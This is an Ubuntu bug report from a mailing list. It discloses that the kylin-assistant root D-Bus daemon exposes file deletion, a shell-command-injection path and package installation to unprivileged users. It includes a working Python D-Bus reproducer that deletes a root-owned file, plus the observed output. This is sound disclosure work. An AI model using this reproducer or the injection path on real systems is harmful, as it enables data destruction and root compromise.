Public bug reported:
Summary
=======
The kylin-assistant system D-Bus daemon runs as root, but its D-Bus policy
permits
unprivileged local users to call privileged methods. Several exported methods do
not authenticate or authorize the caller with polkit or an equivalent mechanism.
The following issues were identified:
1. delete_file(path) deletes a caller-selected file as root. This was reproduced
with an unprivileged user by deleting a root-owned test file in /var/tmp that
the user could not delete directly.
2. adjust_cpufreq_scaling_governer(value) constructs a shell command from the
caller-controlled value and executes it with os.system() as root. Source
review
shows a root command-injection path when a cpufreq scaling_governor node is
present. The tested virtual machine did not expose such a node, so this path
was not dynamically verified there.
3. install(pkg) accepts a caller-selected package name and starts an apt install
operation as root without authorizing the D-Bus sender. This was identified
by
source review and was not used to install an untrusted package during
testing.
An unprivileged local user therefore appears able to compromise system integrity
and, on systems exposing cpufreq nodes, execute arbitrary commands as root.
Test environment
================
* Ubuntu Kylin based on Ubuntu 26.04, UKUI desktop
* amd64 virtual machine, 4 vCPUs and 4 GiB RAM
* Linux kernel 7.0.0
* Unprivileged user test, uid 1000, with no sudo or root credentials
* Distribution-provided python3 and python3-dbus
Steps to reproduce the verified arbitrary-file-deletion issue
==============================================================
Use only a disposable test file. First, an administrator creates a root-
owned file:
sudo sh -c 'printf "test only\n" > /var/tmp/kylin-assistant-test'
sudo chown root:root /var/tmp/kylin-assistant-test
sudo chmod 0600 /var/tmp/kylin-assistant-test
Then log in as an unprivileged user without sudo privileges and confirm that a
direct deletion fails:
rm /var/tmp/kylin-assistant-test
# Expected from rm: Operation not permitted
As the same unprivileged user, run this minimal reproducer:
python3 - <<'PY'
import dbus
bus = dbus.SystemBus()
obj = bus.get_object(
"com.kylin.assistant.systemdaemon",
"/com/kylin/assistant/systemdaemon",
introspect=False,
)
daemon = dbus.Interface(obj, "com.kylin.assistant.systemdaemon")
print(daemon.delete_file("/var/tmp/kylin-assistant-test"))
PY
Finally, check the test file:
ls -l /var/tmp/kylin-assistant-test
Actual result
=============
The D-Bus call succeeds and returns true. The root-owned test file is removed,
although the calling user cannot remove it directly. The backend process is
running as root:
root /usr/bin/python3 /usr/bin/kylin-assistant-backend.py
Observed output from the original reproduction included:
rm: cannot remove '/var/tmp/asst_victim': Operation not permitted
get_system_daemon() -> SystemDaemon
delete_file(root victim) -> 1
ls: cannot access '/var/tmp/asst_victim': No such file or directory
Expected result
===============
The daemon must reject privileged method calls from an unauthorized local user.
Deleting files, changing CPU policy, or installing packages should require an
explicit authorization decision based on the real D-Bus sender.
** Affects: youker-assistant (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/2160486
Title:
kylin-assistant system D-Bus daemon exposes unauthenticated privileged
methods to local users
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/youker-assistant/+bug/2160486/+subscriptions
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs